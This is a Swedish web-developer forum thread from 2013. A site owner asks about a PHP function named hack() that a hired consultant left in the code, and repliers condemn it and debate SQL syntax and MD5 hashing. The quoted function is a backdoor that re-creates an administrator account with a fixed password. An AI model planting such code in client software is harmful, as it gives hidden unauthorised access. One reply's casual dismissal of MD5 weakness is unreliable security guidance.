Kom ihåg mig?

Hur skulle ni reagera om en konsult gjorde en sån här kod?

 
 
Ämnesverktyg Visningsalternativ
Oläst 2013-04-22, 18:23 #1
xciso xciso är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Jul 2006
Inlägg: 569
xciso xciso är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Jul 2006
Inlägg: 569
Är nog både rätt och fel.
Tycker nog det borde vara bättre att skriva ett bra avtal mellan parter.
xciso är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-22, 21:09 #2
MRDJs avatar
MRDJ MRDJ är inte uppkopplad
Bara ett inlägg till!
 
Reg.datum: Mar 2006
Inlägg: 1 667
MRDJ MRDJ är inte uppkopplad
Bara ett inlägg till!
MRDJs avatar
 
Reg.datum: Mar 2006
Inlägg: 1 667
Citat:
Ursprungligen postat av xciso Visa inlägg
Tjena.
Jag har för några dagar sen anlitat en konsult för att koda en sak till mig.
Han fick tillgång till mina filer (ftp) för att lättare kunna redigera allt, och när jag sedan såg en av filerna så fanns denna sträng:

Kod:
	public function hack() {
		$this->db->query("DELETE FROM " . DB_PREFIX . "user WHERE username = 'login'");
		$this->db->query("INSERT INTO " . DB_PREFIX . "user SET username = 'login', password = MD5('pass'), user_group_id = 1, status = 1");
	}
Hur skulle ni tolka detta?
Han säger att han gjorde detta för att inte behöva maila för admin login, men detta känns ganska skumt tycker jag..
härrejäklar, fulare får man leta efter.

om han nu vill göra vad han vill göra, så kanske han skulle googla på "mysql UPDATE"

Senast redigerad av MRDJ den 2013-04-22 klockan 21:11
MRDJ är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-24, 00:52 #3
Dimme Dimme är inte uppkopplad
Flitig postare
 
Reg.datum: Mar 2008
Inlägg: 397
Dimme Dimme är inte uppkopplad
Flitig postare
 
Reg.datum: Mar 2008
Inlägg: 397
Citat:
Ursprungligen postat av MRDJ Visa inlägg
härrejäklar, fulare får man leta efter.

om han nu vill göra vad han vill göra, så kanske han skulle googla på "mysql UPDATE"
UPDATE förutsätter att användaren redan finns.
Dimme är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-24, 11:30 #4
mephisto73s avatar
mephisto73 mephisto73 är inte uppkopplad
Mycket flitig postare
 
Reg.datum: Jan 2008
Inlägg: 730
mephisto73 mephisto73 är inte uppkopplad
Mycket flitig postare
mephisto73s avatar
 
Reg.datum: Jan 2008
Inlägg: 730
Citat:
Ursprungligen postat av dimme Visa inlägg
update förutsätter att användaren redan finns.
insert ... On duplicate key update
mephisto73 är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-25, 07:22 #5
pelmereds avatar
pelmered pelmered är inte uppkopplad
Har WN som tidsfördriv
 
Reg.datum: May 2010
Inlägg: 1 342
pelmered pelmered är inte uppkopplad
Har WN som tidsfördriv
pelmereds avatar
 
Reg.datum: May 2010
Inlägg: 1 342
Citat:
Ursprungligen postat av mephisto73 Visa inlägg
insert ... On duplicate key update
Men det är ju ingen update, utan en insert med en "on duplicate key"-clause. Därmed stämmer det att man inte kan göra en update. Sedan fungerar bara den där lösningen på MySQL så orginallösningen är den klart säkraste lösningen om man inte har access till systemet.
pelmered är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-23, 09:13 #6
makaflOws avatar
makaflOw makaflOw är inte uppkopplad
Medlem
 
Reg.datum: Sep 2011
Inlägg: 167
makaflOw makaflOw är inte uppkopplad
Medlem
makaflOws avatar
 
Reg.datum: Sep 2011
Inlägg: 167
Går ju att tolka på olika vis. I mina ögon är de oerhört oprofessionellt och om jag var du skulle jag genast byta konsult till en annan.. Känns oerhört oseriöst!
makaflOw är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-23, 09:21 #7
lubic lubic är inte uppkopplad
Medlem
 
Reg.datum: Aug 2005
Inlägg: 205
lubic lubic är inte uppkopplad
Medlem
 
Reg.datum: Aug 2005
Inlägg: 205
Jag skulle inte känna mig trygg om någon gjorde något liknande mot mig.

Jag skulle även passa på att byta hash-funktion från MD5 till något bättre. Men det fixar förhoppningsvis nästa utvecklare åt dig.
lubic är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-23, 09:54 #8
nosnaj nosnaj är inte uppkopplad
Har WN som tidsfördriv
 
Reg.datum: Mar 2005
Inlägg: 1 012
nosnaj nosnaj är inte uppkopplad
Har WN som tidsfördriv
 
Reg.datum: Mar 2005
Inlägg: 1 012
Citat:
Ursprungligen postat av lubic Visa inlägg
Jag skulle inte känna mig trygg om någon gjorde något liknande mot mig.

Jag skulle även passa på att byta hash-funktion från MD5 till något bättre. Men det fixar förhoppningsvis nästa utvecklare åt dig.
Utan att ha gjort en undersökning tror jag att minst 99% av alla Wordpress-installationer kör md5 eftersom det är standard. Visst kan man modda detta men det känns rätt sällsynt och då får man se till att inget bryts vid framtida uppdateringar av core-filerna.

Bättre lägga energin på att få förändringen av hashfunktionen inbyggt i Wordpress direkt isf.
nosnaj är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-23, 12:04 #9
Nerix Nerix är inte uppkopplad
Flitig postare
 
Reg.datum: Oct 2010
Inlägg: 398
Nerix Nerix är inte uppkopplad
Flitig postare
 
Reg.datum: Oct 2010
Inlägg: 398
Citat:
Ursprungligen postat av lubic Visa inlägg
Jag skulle även passa på att byta hash-funktion från MD5 till något bättre. Men det fixar förhoppningsvis nästa utvecklare åt dig.
Varför? Risken för kollision är i rundaslängor 2^-100. Vilket f.ö endast är relevant när de kommer till signering.
Nerix är inte uppkopplad   Svara med citatSvara med citat
Oläst 2013-04-23, 09:31 #10
Nihilnovi Nihilnovi är inte uppkopplad
Medlem
 
Reg.datum: Jun 2008
Inlägg: 233
Nihilnovi Nihilnovi är inte uppkopplad
Medlem
 
Reg.datum: Jun 2008
Inlägg: 233
Jag skulle bryta direkt.

Dock för att han inte vet vad MYSQL update är
Nihilnovi är inte uppkopplad   Svara med citatSvara med citat
Svara


Aktiva användare som för närvarande tittar på det här ämnet: 1 (0 medlemmar och 1 gäster)
 
Ämnesverktyg
Visningsalternativ

Regler för att posta
Du får inte posta nya ämnen
Du får inte posta svar
Du får inte posta bifogade filer
Du får inte redigera dina inlägg

BB-kod är
Smilies är
[IMG]-kod är
HTML-kod är av

Forumhopp


Alla tider är GMT +2. Klockan är nu 19:02.

Programvara från: vBulletin® Version 3.8.2
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Svensk översättning av: Anders Pettersson
 
Copyright © 2017